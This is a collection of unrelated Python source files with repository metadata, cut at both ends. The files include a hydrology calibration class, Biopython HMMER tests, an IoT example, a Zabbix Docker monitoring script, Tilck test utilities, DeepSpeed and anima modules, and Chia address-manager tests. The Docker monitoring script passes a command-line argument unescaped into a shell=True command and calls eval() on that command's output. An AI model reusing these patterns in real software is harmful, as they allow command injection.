if not id.strip() in self.hobjects.keys():
self.hobjects[id.strip()] = None #pd.Series(values, index=times)
if id.strip() != id_prev:
if id_prev == '-999999':
times = []
values = []
simvals = []
elif len(times) > 0:
obs = pd.Series(values, index=times)
sim = pd.Series(simvals, index=times)
self.hobjects[id_prev] = CalibrationDataset()
self.hobjects[id_prev].id = id_prev
# new_dataset.dataset = pd.Series(values, index=times)
self.hobjects[id_prev].data = pd.DataFrame({strobs: obs, strsim: sim})
times = []
values = []
simvals = []
id_prev = id.strip()
#consult Fcalib.pas: UpdateErrorStats
#convert observed time to seconds from decimal hours
#ensure to use banker's rounding as Pascal's Round acts like that
time_val_hr = self.str_hours_to_float(time)
v_val, v_val_good = self.floatTryParse(value)
if time_val_hr < 0 or not v_val_good:
#bypass bad time steps and bad obs values
pass
else:
time_val_sec = np.round(time_val_hr * 3600.0)
times.append(time_val_sec)
values.append(v_val)
simvals.append(float('NaN'))
#set up the last hobject calibration data
obs = pd.Series(values, index=times)
sim = pd.Series(simvals, index=times)
self.hobjects[id_prev] = CalibrationDataset()
self.hobjects[id_prev].id = id_prev
self.hobjects[id_prev].data = pd.DataFrame({strobs: obs, strsim: sim})
del times
del values
del simvals
self.status = ECalibrationFileStatus.ReadToCompletion
pass
except IOError:
#print ('cannot open', self.filename)
self.status = ECalibrationFileStatus.ReadIncomplete
pass
else:
#print (self.filename, 'has', len(f.readlines()), 'lines')
pass
finally:
pass
def update_network_sum_stats(self):
self.reset_network_stats()
for lid in self.hobjects:
lcali = self.hobjects[lid]
#lcali = CalibrationDataset()
if lcali.is_selected and not lcali.need_to_calculate_stats:
self.netsum_sim_stats_ctr += lcali.sum_sim_stats_ctr
self.netsum_obs += lcali.sum_obs
self.netsum_sim += lcali.sum_sim
self.netsum_err += lcali.sum_err
self.netsum_err2 += lcali.sum_err2
self.netsum_obs_non0_ctr += lcali.sum_obs_non0_ctr
self.netsum_err_relative += lcali.sum_err_relative
#Updates cumulative sums used for correlation coeff.
self.meansum_ctr += 1
self.meansum_obs += lcali.mean_obs
self.meansum_sim += lcali.mean_sim
self.meansum_obs2 += lcali.mean_obs ** 2
self.meansum_sim2 += lcali.mean_sim ** 2
self.meansum_os += lcali.mean_obs * lcali.mean_sim
self.SumsToStats()
def calc_Rcoeff(self):
#Finds correlation coefficient between X & Y where:
# s[1] = # values
# s[2] = Sum of X
# s[3] = Sum of Y
# s[4] = Sum of X**2
# s[5] = Sum of Y**2
# s[6] = Sum of X*Y
t1 = self.meansum_ctr * self.meansum_obs2 - self.meansum_obs ** 2
t2 = self.meansum_ctr * self.meansum_sim2 - self.meansum_sim ** 2
t3 = self.meansum_ctr * self.meansum_os - self.meansum_obs * self.meansum_sim
t4 = t1 * t2
if t4 <= 0:
return 0.0
else:
return t3 / np.sqrt(t4)
pass
def SumsToStats(self):
if self.meansum_ctr > 0:
self.netmean_obs = self.meansum_obs / self.meansum_ctr
self.netmean_sim = self.meansum_sim / self.meansum_ctr
self.netmean_err = self.netsum_err / self.netsum_sim_stats_ctr
self.netmean_rms = np.sqrt(self.netsum_err2 / self.netsum_sim_stats_ctr)
def reset_network_stats(self):
self.netsum_sim_stats_ctr = 0
self.netsum_obs = 0.0
self.netsum_sim = 0.0
self.netsum_err = 0.0
self.netsum_err2 = 0.0
self.netsum_obs_non0_ctr = 0
self.netsum_err_relative = 0.0
self.meansum_ctr = 0
self.meansum_obs = 0.0
self.meansum_sim = 0.0
self.meansum_obs2 = 0.0
self.meansum_sim2 = 0.0
self.meansum_os = 0.0
|
176d17eb0df3ece42502ae396e954c6b80f7a0c9
|
3d62372eb5e17bf135616de4f196c14a384adf36
|
/Tests/test_SearchIO_hmmer3_tab_index.py
|
a4132dd99d02fc1ebbfc4e3927e1132dea0e227d
|
[
"BSD-3-Clause",
"LicenseRef-scancode-biopython"
] |
permissive
|
biopython/biopython
|
817c9a995a49528937bebefe99f3f5b9054f8947
|
d416809344f1e345fbabbdaca4dd6dcf441e53bd
|
refs/heads/master
| 2023-08-28T05:26:46.916988
| 2023-08-23T14:11:24
| 2023-08-23T14:11:24
| 151,541
| 3,669
| 1,939
|
NOASSERTION
| 2023-09-12T10:19:46
| 2009-03-15T21:09:53
|
Python
|
UTF-8
|
Python
| false
| false
| 4,505
|
py
|
test_SearchIO_hmmer3_tab_index.py
|
# Copyright 2012 by Wibowo Arindrarto. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Tests for SearchIO hmmer3-tab indexing."""
import os
import unittest
from search_tests_common import CheckRaw, CheckIndex
class Hmmer3TabRawCases(CheckRaw):
fmt = "hmmer3-tab"
def test_hmmer3tab_30_multiple_first(self):
"""Test hmmer3-tab raw string retrieval, HMMER 3.0, multiple queries, first (tab_30_hmmscan_001.out)."""
filename = os.path.join("Hmmer", "tab_30_hmmscan_001.out")
raw = """Globin PF00042.17 gi|4885477|ref|NP_005359.1| - 6e-21 74.6 0.3 9.2e-21 74.0 0.2 1.3 1 0 0 1 1 1 1 Globin
"""
self.check_raw(filename, "gi|4885477|ref|NP_005359.1|", raw)
def test_hmmer3tab_30_multiple_middle(self):
"""Test hmmer3-tab raw string retrieval, HMMER 3.0, multiple queries, middle (tab_30_hmmscan_001.out)."""
filename = os.path.join("Hmmer", "tab_30_hmmscan_001.out")
raw = """Ig_3 PF13927.1 gi|126362951:116-221 - 1.4e-09 38.2 0.4 2.1e-09 37.6 0.3 1.3 1 0 0 1 1 1 1 Immunoglobulin domain
Ig_2 PF13895.1 gi|126362951:116-221 - 3.5e-05 23.7 0.1 4.3e-05 23.4 0.1 1.1 1 0 0 1 1 1 1 Immunoglobulin domain
"""
self.check_raw(filename, "gi|126362951:116-221", raw)
def test_hmmer3tab_30_multiple_last(self):
"""Test hmmer3-tab raw string retrieval, HMMER 3.0, multiple queries, last (tab_30_hmmscan_001.out)."""
filename = os.path.join("Hmmer", "tab_30_hmmscan_001.out")
raw = """Pou PF00157.12 gi|125490392|ref|NP_038661.2| - 7e-37 124.8 0.5 1.4e-36 123.9 0.3 1.5 1 0 0 1 1 1 1 Pou domain - N-terminal to homeobox domain
Homeobox PF00046.24 gi|125490392|ref|NP_038661.2| - 2.1e-18 65.5 1.1 4.1e-18 64.6 0.7 1.5 1 0 0 1 1 1 1 Homeobox domain
HTH_31 PF13560.1 gi|125490392|ref|NP_038661.2| - 0.012 15.6 0.0 0.16 12.0 0.0 2.2 2 0 0 2 2 2 0 Helix-turn-helix domain
Homeobox_KN PF05920.6 gi|125490392|ref|NP_038661.2| - 0.039 13.5 0.0 0.095 12.3 0.0 1.6 1 0 0 1 1 1 0 Homeobox KN domain
DUF521 PF04412.8 gi|125490392|ref|NP_038661.2| - 0.14 10.5 0.1 0.26 9.6 0.1 1.4 1 0 0 1 1 1 0 Protein of unknown function (DUF521)
"""
self.check_raw(filename, "gi|125490392|ref|NP_038661.2|", raw)
def test_hmmer3tab_30_single(self):
"""Test hmmer3-tab raw string retrieval, HMMER 3.0, single query (tab_30_hmmscan_004.out)."""
filename = os.path.join("Hmmer", "tab_30_hmmscan_004.out")
raw = """Ig_3 PF13927.1 gi|126362951:116-221 - 1.4e-09 38.2 0.4 2.1e-09 37.6 0.3 1.3 1 0 0 1 1 1 1 Immunoglobulin domain
Ig_2 PF13895.1 gi|126362951:116-221 - 3.5e-05 23.7 0.1 4.3e-05 23.4 0.1 1.1 1 0 0 1 1 1 1 Immunoglobulin domain
"""
self.check_raw(filename, "gi|126362951:116-221", raw)
class Hmmer3TabIndexCases(CheckIndex):
fmt = "hmmer3-tab"
def test_hmmer3tab_30_hmmscan_001(self):
"""Test hmmer3-tab indexing, HMMER 3.0, multiple queries."""
filename = os.path.join("Hmmer", "tab_30_hmmscan_001.out")
self.check_index(filename, self.fmt)
def test_hmmer3tab_30_hmmscan_002(self):
"""Test hmmer3-tab indexing, HMMER 3.0, single query, no hits."""
filename = os.path.join("Hmmer", "tab_30_hmmscan_002.out")
self.check_index(filename, self.fmt)
def test_hmmer3tab_30_hmmscan_003(self):
"""Test hmmer3-tab indexing, HMMER 3.0, single query, multiple hits."""
filename = os.path.join("Hmmer", "tab_30_hmmscan_003.out")
self.check_index(filename, self.fmt)
def test_hmmer3tab_30_hmmscan_004(self):
"""Test hmmer3-tab indexing, HMMER 3.0, single query, no alignments."""
filename = os.path.join("Hmmer", "tab_30_hmmscan_004.out")
self.check_index(filename, self.fmt)
if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
|
95e1c037ea8bd7e755ea541218aa77434d124530
|
3479ae8920fcb66579bb47ebaf37d00ca3395d82
|
/example/storage_log.py
|
9f695d21ecfd6e4513580a3fee371829129c674c
|
[
"MIT"
] |
permissive
|
blinker-iot/blinker-py
|
2821cc47882aa7517023a6c24cf2d3a197045282
|
0f7848dbe118ecd00eb1e67a354b4a8a02a57fab
|
refs/heads/dev_3.0
| 2022-07-08T16:55:29.158684
| 2022-04-28T13:37:31
| 2022-04-28T13:37:31
| 127,432,055
| 1,956
| 32
|
MIT
| 2022-03-12T14:11:51
| 2018-03-30T13:36:17
|
Python
|
UTF-8
|
Python
| false
| false
| 329
|
py
|
storage_log.py
|
# -*- coding: utf-8 -*-
"""
日志存储示例
"""
__author__ = 'stao'
from blinker import Device
async def ready_func():
while True:
log = "This is log test"
await device.saveLogData(log)
device = Device("authKey", protocol="mqtts", ready_func=ready_func)
if __name__ == '__main__':
device.run()
|
475cd0746c2b556494d005b808be32cb011a2984
|
5e601244fbf32ee5190fb5210a0cd334473a0abe
|
/projects/LinuxSystemOps/SoftwareManagement/docker/zabbix_monitor_docker.py
|
52a670f09735b213413c5b2f7489d8adcaac48e8
|
[] |
no_license
|
DingGuodong/LinuxBashShellScriptForOps
|
69ebe45cf3f92b741a078b9b78c2600328ce9b9e
|
b2ca1e4c870626dd078d447e2d1479b08602bdf6
|
refs/heads/master
| 2023-08-21T20:53:40.617397
| 2023-07-17T01:41:05
| 2023-07-17T01:41:05
| 57,015,255
| 453
| 343
| null | 2023-02-16T01:29:23
| 2016-04-25T05:55:28
|
Python
|
UTF-8
|
Python
| false
| false
| 4,581
|
py
|
zabbix_monitor_docker.py
|
#!/usr/bin/python
# encoding: utf-8
# -*- coding: utf8 -*-
"""
Created by PyCharm.
File: LinuxBashShellScriptForOps:zabbix_monitor_docker.py
User: Guodong
Create Date: 2017/1/5
Create Time: 15:59
"""
# fork and modify something from http://dl528888.blog.51cto.com/2382721/1660844
import os
import json
import sys
import subprocess
import time
try:
from docker import Client
except ImportError:
try:
command_to_execute = "pip install docker-py"
os.system(command_to_execute)
except OSError:
exit(1)
finally:
from docker import Client
def check_container_stats(container_name, collect_item):
stats = client.stats(container=container_name)
old_result = json.loads(stats.next())
new_result = json.loads(stats.next())
client.close()
result = None
if collect_item == 'cpu_total_usage':
result = new_result['cpu_stats']['cpu_usage']['total_usage'] - old_result['cpu_stats']['cpu_usage'][
'total_usage']
elif collect_item == 'cpu_system_usage':
result = new_result['cpu_stats']['system_cpu_usage'] - old_result['cpu_stats']['system_cpu_usage']
elif collect_item == 'cpu_percent':
cpu_total_usage = new_result['cpu_stats']['cpu_usage']['total_usage'] - old_result['cpu_stats']['cpu_usage'][
'total_usage']
cpu_system_usage = new_result['cpu_stats']['system_cpu_usage'] - old_result['cpu_stats']['system_cpu_usage']
cpu_num = len(old_result['cpu_stats']['cpu_usage']['percpu_usage'])
result = round((float(cpu_total_usage) / float(cpu_system_usage)) * cpu_num * 100.0, 2)
elif collect_item == 'mem_usage':
result = new_result['memory_stats']['usage']
elif collect_item == 'mem_limit':
result = new_result['memory_stats']['limit']
elif collect_item == 'mem_percent':
mem_usage = new_result['memory_stats']['usage']
mem_limit = new_result['memory_stats']['limit']
result = round(float(mem_usage) / float(mem_limit) * 100.0, 2)
# network_rx_packets=new_result['network']['rx_packets']
# network_tx_packets=new_result['network']['tx_packets']
elif collect_item == 'network_rx_bytes':
network_check_command = """docker exec %s awk '/eth0/ {print "{\\"rx\\":"$2",\\"tx\\":"$10"}"}' /proc/net/dev""" \
% container_name
network_old_result = eval(
((subprocess.Popen(network_check_command, shell=True, stdout=subprocess.PIPE)).stdout.readlines()[0]).strip(
'\n'))
time.sleep(1)
network_new_result = eval(
((subprocess.Popen(network_check_command, shell=True, stdout=subprocess.PIPE)).stdout.readlines()[0]).strip(
'\n'))
result = int(network_new_result['rx']) - int(network_old_result['rx'])
elif collect_item == 'network_tx_bytes':
network_check_command = """docker exec %s awk '/eth0/ {print "{\\"rx\\":"$2",\\"tx\\":"$10"}"}' /proc/net/dev""" \
% container_name
network_old_result = eval(
((subprocess.Popen(network_check_command, shell=True, stdout=subprocess.PIPE)).stdout.readlines()[0]).strip(
'\n'))
time.sleep(1)
network_new_result = eval(
((subprocess.Popen(network_check_command, shell=True, stdout=subprocess.PIPE)).stdout.readlines()[0]).strip(
'\n'))
result = int(network_new_result['tx']) - int(network_old_result['tx'])
return result
if __name__ == "__main__":
linux = (sys.platform == "linux2")
if not linux:
print "Does not meet the prerequisites, Linux system is required. Aborted. "
sys.exit(1)
docker_socket_abs_path = "/var/run/docker.sock"
current_option_flags = os.getenv("-") # TODO(Guodong Ding) check it out that if current shell is interactive shell.
if "i" in current_option_flags:
while True:
if not os.path.exists(docker_socket_abs_path):
print "can not locate docker socket file, please manually specify one."
docker_socket_abs_path = raw_input("path to docker socket file, default is \"/var/run/docker.sock\": ")
else:
break
client = Client(base_url='unix://' + docker_socket_abs_path)
container = None
item = None
if sys.argv[1] is not None and sys.argv[2] is not None:
container = sys.argv[1]
item = sys.argv[2]
else:
exit(1)
print check_container_stats(container, item)
|
508445cf840b20a975be7ab946942d6c7ce62abb
|
9e0c8c8d8bafa73d133e41f201badc756c92978a
|
/tests/runners/lib/utils.py
|
cc67b43fba6b340061b648f801eb89f6f29fdc0d
|
[
"BSD-2-Clause",
"MIT",
"CC0-1.0",
"BSD-3-Clause",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause-Views"
] |
permissive
|
vvaltchev/tilck
|
ccf8d9933be1269b85388e5b21645b831ecf5412
|
e9c27da4dd15f5f8a927b11f31484aec3f1429f0
|
refs/heads/master
| 2023-08-16T00:07:42.593483
| 2023-07-04T21:00:31
| 2023-07-19T23:25:42
| 53,845,595
| 2,142
| 115
|
BSD-2-Clause
| 2023-09-03T05:36:46
| 2016-03-14T10:02:41
|
C
|
UTF-8
|
Python
| false
| false
| 3,005
|
py
|
utils.py
|
# SPDX-License-Identifier: BSD-2-Clause
import re
import os
import sys
import fcntl
import base64
import zlib
import subprocess
from enum import Enum
from .stdio import msg_print, raw_print, direct_print
# Constants
TEST_TYPES = ['selftest', 'shellcmd', 'interactive']
TEST_TYPES_PRETTY = ['Self tests', 'Shell cmd tests', 'Interactive tests']
KERNEL_DUMP_GCDA_STR = '** GCOV gcda files **'
KERNEL_DUMP_GCDA_END_STR = '** GCOV gcda files END **'
# Classes
class Fail(Enum):
success = 0
invalid_args = 1
reboot = 2
timeout = 3
panic = 4
shell_no_zero_exit = 5
gcov_error = 6
shell_unknown_exit_code = 7
invalid_build_config = 8
invalid_system_config = 9
no_hello_message = 10
user_interruption = 11
qemu_msg_parsing_fail = 12
qemu_died_unexpectedly = 13
some_tests_failed = 14
no_tests_matching = 15
other = 16
# Globals
__g_fail_reason = Fail.success
# Functions
def set_once_fail_reason(reason: Fail):
global __g_fail_reason
if __g_fail_reason == Fail.success:
__g_fail_reason = reason
def get_fail_reason():
return __g_fail_reason
def no_failures():
return __g_fail_reason == Fail.success
def any_failures():
return __g_fail_reason != Fail.success
def reset_fail_reason():
global __g_fail_reason
__g_fail_reason = Fail.success
def get_fail_by_code(err_code):
for f in Fail:
if f.value == err_code:
return f
return None
def is_cmake_opt_enabled(opt):
return opt.lower() in ["on", "1", "true", "yes", "y"]
def fh_set_blocking_mode(fh, blocking):
sys_fd = fh.fileno()
fl = fcntl.fcntl(sys_fd, fcntl.F_GETFL)
if not blocking:
fcntl.fcntl(sys_fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
else:
fcntl.fcntl(sys_fd, fcntl.F_SETFL, fl & ~os.O_NONBLOCK)
def run_gen_coverage_report_tool(gen_cov_tool):
try:
subprocess.check_output([gen_cov_tool, '--acc'])
except Exception as e:
msg_print(
"{} generated the exception: {}".format(gen_cov_tool, str(e))
)
msg_print("Output of {} --acc:".format(gen_cov_tool))
direct_print(getattr(e, 'output', '<no output>'))
msg_print("--- end output ---")
return False
return True
def write_gcda_file(file, b64data):
try:
data_compressed = base64.b64decode(b64data)
data = zlib.decompress(data_compressed)
with open(file, 'wb') as fh:
fh.write(data)
except Exception as e:
msg_print("")
msg_print(
"While writing gcda file '{}', "
"got exception: {}".format(file, str(e))
)
raw_print("b64data:\n<<{}>>\n".format(b64data))
set_once_fail_reason(Fail.gcov_error)
return False
return True
def unrunnable_build_graceful_exit():
msg_print("This build was NOT meant to be run")
msg_print("Just exiting with 0")
sys.exit(0)
|
49610b56f692e74b9b1be58a16c9a013169f31a8
|
380a47268c5975473a2e7c38c747bc3bdbd981b1
|
/benchmark/third_party/DeepSpeed/deepspeed/profiling/config.py
|
0671211132c626e2a0377218dd5fe75983acd888
|
[
"MIT",
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
FMInference/FlexGen
|
07aa9b1918c19b02077e13ad07e76840843810dd
|
d34f7b4b43ed87a374f394b0535ed685af66197b
|
refs/heads/main
| 2023-07-24T02:29:51.179817
| 2023-07-21T22:38:31
| 2023-07-21T22:38:31
| 602,270,517
| 6,821
| 411
|
Apache-2.0
| 2023-07-07T22:59:24
| 2023-02-15T21:18:53
|
Python
|
UTF-8
|
Python
| false
| false
| 2,028
|
py
|
config.py
|
"""
Copyright (c) Microsoft Corporation
Licensed under the MIT license.
"""
from deepspeed.runtime.config_utils import get_scalar_param, DeepSpeedConfigObject
from deepspeed.profiling.constants import *
class DeepSpeedFlopsProfilerConfig(DeepSpeedConfigObject):
def __init__(self, param_dict):
super(DeepSpeedFlopsProfilerConfig, self).__init__()
self.enabled = None
self.profile_step = None
self.module_depth = None
self.top_modules = None
if FLOPS_PROFILER in param_dict.keys():
flops_profiler_dict = param_dict[FLOPS_PROFILER]
else:
flops_profiler_dict = {}
self._initialize(flops_profiler_dict)
def _initialize(self, flops_profiler_dict):
self.enabled = get_scalar_param(flops_profiler_dict,
FLOPS_PROFILER_ENABLED,
FLOPS_PROFILER_ENABLED_DEFAULT)
self.profile_step = get_scalar_param(flops_profiler_dict,
FLOPS_PROFILER_PROFILE_STEP,
FLOPS_PROFILER_PROFILE_STEP_DEFAULT)
self.module_depth = get_scalar_param(flops_profiler_dict,
FLOPS_PROFILER_MODULE_DEPTH,
FLOPS_PROFILER_MODULE_DEPTH_DEFAULT)
self.top_modules = get_scalar_param(flops_profiler_dict,
FLOPS_PROFILER_TOP_MODULES,
FLOPS_PROFILER_TOP_MODULES_DEFAULT)
self.detailed = get_scalar_param(flops_profiler_dict,
FLOPS_PROFILER_DETAILED,
FLOPS_PROFILER_DETAILED_DEFAULT)
self.output_file = get_scalar_param(flops_profiler_dict,
FLOPS_PROFILER_OUTPUT_FILE,
FLOPS_PROFILER_OUTPUT_FILE_DEFAULT)
|
12f6fa59b3629c627673e7e4078a8547a6b87181
|
113c07b9e4b1824ba96480e0ddb1789451941ec0
|
/anima/dcc/external.py
|
ddbfedad08ffb4a2aae3981a9538dfeed346fc67
|
[
"MIT"
] |
permissive
|
eoyilmaz/anima
|
72834358e7ad2c33780a963196413861edf7a557
|
7b4cf60cb17f00435ecc3e03d573a9e2d0b44fe0
|
refs/heads/master
| 2023-07-20T05:56:02.982296
| 2023-07-06T09:13:08
| 2023-07-06T09:13:08
| 16,981,630
| 113
| 27
|
MIT
| 2021-09-02T21:25:57
| 2014-02-19T11:02:29
|
Python
|
UTF-8
|
Python
| false
| false
| 10,666
|
py
|
external.py
|
# -*- coding: utf-8 -*-
import os
from anima import logger
from anima.dcc.base import DCCBase
external_dccs = {
"MudBox": {
"name": "MudBox",
"icon": "mudbox.png",
"executable": {
"linux": "mudbox",
"windows": "mudbox.exe",
},
"extensions": [".mud"],
"structure": [
"Outputs",
],
},
"ZBrush": {
"name": "ZBrush",
"icon": "zbrush.png",
"executable": {
"windows": "zbrush.exe",
},
"extensions": [".ztl"],
"structure": [
"Outputs",
],
},
}
class ExternalDCC(DCCBase):
"""An external DCC which doesn't support Python
A very simple object that handles external environments. For now it just
returns the name of the DCC, conforms the given version to the
DCC by setting its file extension etc.
"""
def __init__(self, name, structure=None, extensions=None, **kwargs):
"""
:param name: The name of this DCC
:param extensions: The extensions of this DCC
:param structure: The folder structure of this DCC
:return:
"""
super(ExternalDCC, self).__init__(name=name)
self._name = None
self._structure = None
self._extensions = None
self.name = self._validate_name(name)
self.structure = self._validate_structure(structure)
self.extensions = self._validate_extensions(extensions)
def _validate_extensions(self, extensions):
if not extensions:
raise TypeError(
"{}.extension should be a str, not None".format(self.__class__.__name__)
)
if not isinstance(extensions, list):
raise TypeError(
"{}.extension should be a list of str, not {}".format(
self.__class__.__name__, extensions.__class__.__name__
)
)
for i, extension in enumerate(extensions):
if not extension.startswith("."):
extension = ".%s" % extension
extensions[i] = extension
return extensions
@property
def extensions(self):
return self._extensions
@extensions.setter
def extensions(self, extensions):
self._extensions = self._validate_extensions(extensions)
def _validate_name(self, name):
"""validates the given name value
:param name: the desired name
:return: str
"""
from anima import string_types
if not isinstance(name, string_types):
raise TypeError(
"%s.name should be an instance of str, not %s"
% (self.__class__.__name__, name.__class__.__name__)
)
return name
@property
def name(self):
"""the name property getter
:return: str
"""
return self._name
@name.setter
def name(self, name):
"""the name property setter
:param str name: A string value for desired name should
contain a value which starts with "."
:return: None
"""
self._name = self._validate_name(name)
def _validate_structure(self, structure):
"""validates the given structure value
:param str structure:
:return: str
"""
if structure is None:
structure = []
if not isinstance(structure, list):
raise TypeError(
"%s.structure should be a list of strings, "
"showing the folder structure, not %s"
% (self.__class__.__name__, structure.__class__.__name__)
)
for item in structure:
if not isinstance(item, str):
raise TypeError(
"All items in %s.structure should be an "
"instance of str, an not %s"
% (self.__class__.__name__, item.__class__.__name__)
)
return structure
@property
def structure(self):
"""the structure property getter
:return: str
"""
return self._structure
@structure.setter
def structure(self, structure):
"""the structure property setter
:param list structure: A list of string showing the desired folders on that DCC
:return: None
"""
self._structure = self._validate_structure(structure)
def conform(self, version):
"""Conforms the version to this DCC by setting its extension."""
logger.debug("conforming version")
from stalker import Version
if not isinstance(version, Version):
raise TypeError(
"version argument should be a "
"stalker.version.Version instance, not %s" % version.__class__.__name__
)
version.update_paths()
version.extension = self.extensions[0]
version.created_with = self.name
logger.debug("version.absolute_full_path : %s" % version.absolute_full_path)
logger.debug(
"finished conforming version extension to: %s" % self.extensions[0]
)
def initialize_structure(self, version):
"""Initializes the DCC folder structure
:return:
"""
# check version type
from stalker import Version
if not isinstance(version, Version):
raise TypeError(
'"version" argument in %s.initialize_structureshould be a '
"stalker.version.Version instance, not %s"
% (self.__class__.__name__, version.__class__.__name__)
)
# create the folder in version.absolute_path
extension = version.extension
version.update_paths()
version.extension = extension
for folder in self.structure:
folder_path = os.path.join(version.absolute_path, folder)
logger.debug("creating: %s" % folder_path)
try:
os.makedirs(folder_path)
except OSError:
# dir exists
pass
def save_as(self, version, run_pre_publishers=True):
"""A compatibility method which will allow this DCC to be used
in place of anima.dcc.base.DCCBase derivatives.
:param version: stalker.models.version.Version instance
:param bool run_pre_publishers: Run pre publishers of this DCC
or not. Default value is True
:return:
"""
# just conform the version and initialize_structure
self.conform(version)
self.initialize_structure(version)
self.append_to_recent_files(version)
@classmethod
def get_settings_file_path(cls):
"""returns the settings file path
:return:
"""
# append to .atrc file
atrc_path = os.path.expanduser("~/.atrc/")
last_version_filename = "last_version"
return os.path.join(atrc_path, last_version_filename)
def append_to_recent_files(self, version):
"""Appends the given version info to the recent files list
:param version: A :class:`~stalker.models.version.Version` instance.
:return:
"""
from stalker import Version
if not isinstance(version, Version):
raise TypeError(
'"version" argument in %s.append_to_recent_files '
"method should be an instance of "
"stalker.models.version.Version, not %s"
% (self.__class__.__name__, version.__class__.__name__)
)
last_version_file_full_path = self.get_settings_file_path()
try:
os.makedirs(os.path.dirname(last_version_file_full_path))
except OSError:
pass
with open(last_version_file_full_path, "w") as f:
f.write(str(version.id))
def get_last_version(self):
"""returns the current version"""
last_version_file_full_path = self.get_settings_file_path()
try:
with open(last_version_file_full_path, "r") as f:
lines = f.readlines()
vid = lines[0]
from stalker import Version
return Version.query.filter(Version.id == vid).first()
except (IOError, IndexError):
return None
class ExternalDCCFactory(object):
"""A factory for External DCCs.
A Factory object for DCCs. Generates :class:`ExternalDCC` instances.
"""
@classmethod
def get_env_names(cls, name_format="%n"):
"""returns a list of DCC names which it is possible to create one DCC.
:param str name_format: A string showing the format of the output
variables:
%n : the name of the Environment
%e : the extension of the Environment
:return list: list
"""
env_names = []
for env_name in list(external_dccs.keys()):
env_data = external_dccs[env_name]
env_names.append(
name_format.replace("%n", env_data["name"]).replace(
"%e", env_data["extensions"][0]
)
)
return env_names
@classmethod
def get_env(cls, name, name_format="%n"):
"""Create a DCC with the given name.
Args:
name (str): The name of the DCC, should be a value from
anima.dcc.externalEnv.environment_names list.
name_format (str): The name format.
Returns:
ExternalDCC: ExternalDCC instance.
"""
if not isinstance(name, str):
raise TypeError(
'"name" argument in %s.get_env() should be an '
"instance of str, not %s" % (cls.__name__, name.__class__.__name__)
)
# filter the name
import re
# replace anything that doesn't start with '%' with [\s\(\)\-]+
pattern = re.sub(r"[^%\w]+", r"[\\s\\(\\)\\-]+", name_format)
pattern = pattern.replace("%n", r"(?P<name>[\w\s]+)").replace(
"%e", r"(?P<extension>\.\w+)"
)
logger.debug("pattern : {}".format(pattern))
match = re.search(pattern, name)
dcc_name = None
if match:
dcc_name = match.group("name").strip()
if dcc_name not in external_dccs:
raise ValueError(
"%s is not in "
"anima.dcc.externalEnv.environment_names list, "
"please supply a value from %s" % (name, list(external_dccs.keys()))
)
dcc = external_dccs[dcc_name]
return ExternalDCC(**dcc)
|
7f0217ecc747ecbc26166dc8883118ca0141b79d
|
3bc139860403ebd05e278c95fca26e24d5189271
|
/tests/core/full_node/test_address_manager.py
|
97134e51b9c4cbc751f12ff7f6e497d7f2b03e44
|
[
"Apache-2.0"
] |
permissive
|
Chia-Network/chia-blockchain
|
a09183b7240b159419b45f8373a41a1062f77ef3
|
d966f3f9e63aed52dbd73544164202a9f11ce3d2
|
refs/heads/main
| 2023-08-31T09:37:13.741283
| 2023-08-30T18:27:22
| 2023-08-30T18:27:22
| 197,153,676
| 12,936
| 2,474
|
Apache-2.0
| 2023-09-14T19:08:51
| 2019-07-16T08:32:40
|
Python
|
UTF-8
|
Python
| false
| false
| 23,835
|
py
|
test_address_manager.py
|
from __future__ import annotations
import math
import time
from pathlib import Path
import pytest
from chia.server.address_manager import AddressManager, ExtendedPeerInfo
from chia.server.address_manager_store import AddressManagerStore
from chia.types.peer_info import PeerInfo, TimestampedPeerInfo
from chia.util.ints import uint16, uint64
class AddressManagerTest(AddressManager):
def __init__(self, make_deterministic=True):
super().__init__()
if make_deterministic:
self.make_deterministic()
self.make_private_subnets_valid()
def make_deterministic(self):
# Fix seed.
self.key = 2**256 - 1
async def simulate_connection_fail(self, peer):
await self.mark_good(peer.peer_info, True, 1)
await self.attempt(peer.peer_info, False, time.time() - 61)
async def add_peer_info(self, peers, peer_src=None):
timestamped_peers = [
TimestampedPeerInfo(
peer.host,
peer.port,
0,
)
for peer in peers
]
added = await self.add_to_new_table(timestamped_peers, peer_src)
return added
class TestPeerManager:
@pytest.mark.asyncio
async def test_addr_manager(self):
addrman = AddressManagerTest()
# Test: Does Addrman respond correctly when empty.
none_peer = await addrman.select_peer()
assert none_peer is None
assert await addrman.size() == 0
# Test: Does Add work as expected.
peer1 = PeerInfo("250.1.1.1", 8444)
assert await addrman.add_peer_info([peer1])
assert await addrman.size() == 1
peer1_ret = await addrman.select_peer()
assert peer1_ret.peer_info == peer1
# Test: Does IP address deduplication work correctly.
peer1_duplicate = PeerInfo("250.1.1.1", 8444)
assert not await addrman.add_peer_info([peer1_duplicate])
assert await addrman.size() == 1
# Test: New table has one addr and we add a diff addr we should
# have at least one addr.
# Note that addrman's size cannot be tested reliably after insertion, as
# hash collisions may occur. But we can always be sure of at least one
# success.
peer2 = PeerInfo("250.1.1.2", 8444)
assert await addrman.add_peer_info([peer2])
assert await addrman.size() >= 1
# Test: AddrMan::Add multiple addresses works as expected
addrman2 = AddressManagerTest()
peers = [peer1, peer2]
assert await addrman2.add_peer_info(peers)
assert await addrman2.size() >= 1
@pytest.mark.asyncio
async def test_addr_manager_ports(self):
addrman = AddressManagerTest()
assert await addrman.size() == 0
source = PeerInfo("252.2.2.2", 8444)
# Test: Addr with same IP but diff port does not replace existing addr.
peer1 = PeerInfo("250.1.1.1", 8444)
assert await addrman.add_peer_info([peer1], source)
assert await addrman.size() == 1
peer2 = PeerInfo("250.1.1.1", 8445)
assert not await addrman.add_peer_info([peer2], source)
assert await addrman.size() == 1
peer3 = await addrman.select_peer()
assert peer3.peer_info == peer1
# Test: Add same IP but diff port to tried table, it doesn't get added.
# Perhaps this is not ideal behavior but it is the current behavior.
await addrman.mark_good(peer2)
assert await addrman.size() == 1
peer3_ret = await addrman.select_peer(True)
assert peer3_ret.peer_info == peer1
# This is a fleaky test, since it uses randomness.
# TODO: Make sure it always succeeds.
@pytest.mark.asyncio
async def test_addrman_select(self):
addrman = AddressManagerTest()
source = PeerInfo("252.2.2.2", 8444)
# Test: Select from new with 1 addr in new.
